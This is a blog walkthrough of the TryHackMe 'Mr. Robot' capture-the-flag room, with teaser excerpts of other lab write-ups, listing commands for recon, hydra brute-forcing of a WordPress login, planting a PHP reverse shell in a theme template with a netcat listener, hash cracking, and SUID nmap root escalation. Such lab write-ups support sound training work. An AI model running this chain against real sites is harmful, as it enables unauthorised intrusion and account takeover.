[ Mr. Robot ] -TRYHACKME

By -


Machine Name: Mr. Robot
Difficulty: Medium

Link: https://tryhackme.com/room/mrrobot

Hello guys This machine is based on the most famous web-series Mr.Robot. This is medium difficulty machine and contains three flags. So let's try capture all three flags one by one.

Initial recon

As usual we are going to scan all the network using nmap to check which services are running on the IP address.

flags used in nmap scan
-sV for service version scan
-sC for scan with default NSE scripts
-oA for output in the three major formats at once

nmap -sV -sC -oA mrrobot 10.10.108.7

 Only couple of ports are open, have a look in browser at open port 80

 An interesting site shown on port 80

use gobuster to scan the whole website and it's directory type the following command in the terminal for start the search.

gobuster -t 100 dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.108.7/


gobuster directory scanning shows many of hosted directory and after scanning robots.txt is interesting for us because robots.txt contains our first key and dictionary file named as fsocity.dic.


fsocity.dic is used for finding username and password for the wordpress login.

now we can grab our first key from http://10.10.108.7/ using wget command

run this command in the terminal

wget http://10.10.108.7/key-1-of-3.txt


Gain Access

In gobuster directory scanning this tool captures wordpress login page so let's checkout the url http://10.10.108.7/wp-login

This page gives access to the admin control of the wordpress server so let's find out the username and password of the admin. Now here we can use fsocity.dic file to bruteforce the webpage.


The error message for the invalid username means we have to find the username and password for the wordpress login box. This is quite easy because we just found the fsocity.dic file from the initial recon this dictionary file helps us to find the username and password. Fire up burp first to intercept login response.

we can use these log line to find the username using hydra

hydra -V -L fsocity.dic -p 123 10.10.108.7 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

After few seconds we find the username as Elliot. Now repeat using hydra

hydra -V -L Elliot -p fsocity.dic 10.10.108.7 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

We find the password in the file as ERxx-06xx, we can login in wordpress

Quick look around we find and upload item on the wordpress server. Let's upload reverse shell to the wordpress so we can connect. Grab php script from the kali. php-reverse-shell.php is pre-install in /usr/share/webshells/php

it's just same version on pentestmonkey.

copy the content from the php-reverse-shell.php and past it in the 404.php template, overwrite all that was in before. Don't forget to change ip to your tun0 ip


Now it's time to fireup the listener i am using netcat for listen on the port 1234 follow the command

nc -lnvp 1234

After starting the listener now it's time to start php-reverse-shell using curl to do this type the command

curl http://10.10.108.7/404.php

After running this command we got shell from of the server and now we can upgrade the shell.

type the command in open session

python -c 'import pty; pty.spawn("/bin/bash")'

This command spwan the bash shelll

daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
<<HIDDEN>>

This md5 hash contains the password for the user robot so let's crack it from crackstation after second we got the password for the user robot now login as robot and cat key-2-of-3.txt. Sucess we got another key. Now it's time to root the machine and grab the last key.


Privilge Escalation

Now we need to escalate to root to get the last key. First we need to look file with SUID set. These set helps us to run as root.

type command

find / -perm -4000 2>/dev/null


We see nmap is in the list so we can easy run nmap interactive mode to get the root shell

type the command

nmap --interactive

Now we have nmap interactive mode.

To get the root shell type !sh in nmap interactive mode

Now we have root shell type cat /root/key-3-of-3.txt to get the last root key.

Hello World!! I am Mayank Srivastava and i am graduated in computer application from Veer Bahadur Singh Purvanchal University. And I post tutorials on programming languages. I'd like to share some of my knowledge with everyone. And also i am interested in Cyber Security Penetration Testing.

Comments

Post a Comment

Popular posts from this blog

[ Blue ] - TRYHACKME

By -
Image
Hello guys Today i am going to do walkthrough on the machine called Blue. This is very easy box based on the vulnerability of EternalBlue( CVE-2017-0143 ). As usual first thing we are going to do is scanning the network using the nmap tool to see which ports are open and which services are running on this machine. The flags used in the nmap scan are: -sS - for a syn scan -sV -for a service version scan -O - to identify the OS used -T4 - the speed of scan -open - to show only the open ports We notice the service running on the port 445 is SMB so we can use nmap script engine to verify this service is vulnerable or not for EternalBlue vulnerability. The flags used are: -p - to test only the port provided(in this case 445) --script=smb-vuln-ms17-010 - the nmap script to run against our target The output of the scan is shown us to machine is vulnerable. Metasploit already has this exploit, so let's fire it up to gain access. To start the metasploit console just run the command msfco...
Read more

[ The Cod Caper ] - TRYHACKME

By -
Image
    Check out the room https://tryhackme.com/room/thecodcaper Hello everyone  this is another walkthrough blog of tryhackme, this room contains some trick to crack the linux machines root password. Room name : The Cod Caper Machine Type : Linux Task 2  We'll run nmap on the target # nmap -sV -A -p1-1000 -T4 -oN initial <target-machine-ip> Task 3 As recommended in tryhackme the cod caper room we'll use  gobuster  for the directory checking the wordlist for  gobuster  is in the task for downloading. Don't forget to user  -x  flag for specific extension search like ". html, .txt, .php " # gobuster dir -u <target_url> -w "path/of/wordlist" -x ".php" -x flag is important because we have to check the specific extension like ".html, .php" After gobuster directory bruteforcing we have admin page for login but we don't have username and password for login so we have to find the username and password to access the page. Task 4 W...
Read more

[ Basics Penetration Testing ] - TRYHACKME

By -
Image
[ Basics Penetration Testing ] - TRYHACKME.COM   This article is for basics penetration testing  1. Deploy the machine and connect to the tryhackme network. 2. Find the service exposed by the machine. For finding the service here we can use nmap  nmap -sC -sV -oN initial <machine_ip> # Nmap 7.80 scan initiated Sun Sep 27 11:26:39 2020 as: nmap -sC -sV -oN initial 10.10.38.194 Nmap scan report for 10.10 .38.196 Host is up ( 0 .077s latency ) . Not shown: 997 closed ports PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 7 .2p2 Ubuntu 4ubuntu2.4 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 ( RSA ) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce ( ECDSA ) | _ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 ( ED25519 ) 139 /tcp open netbios-ssn Samba smbd 3 .X - 4 .X ( workgroup: WORKGROUP ) 445 /tcp open netbios-ssn Samba smbd 4.3 .11-Ubuntu ( workgroup: WORKGROUP ...
Read more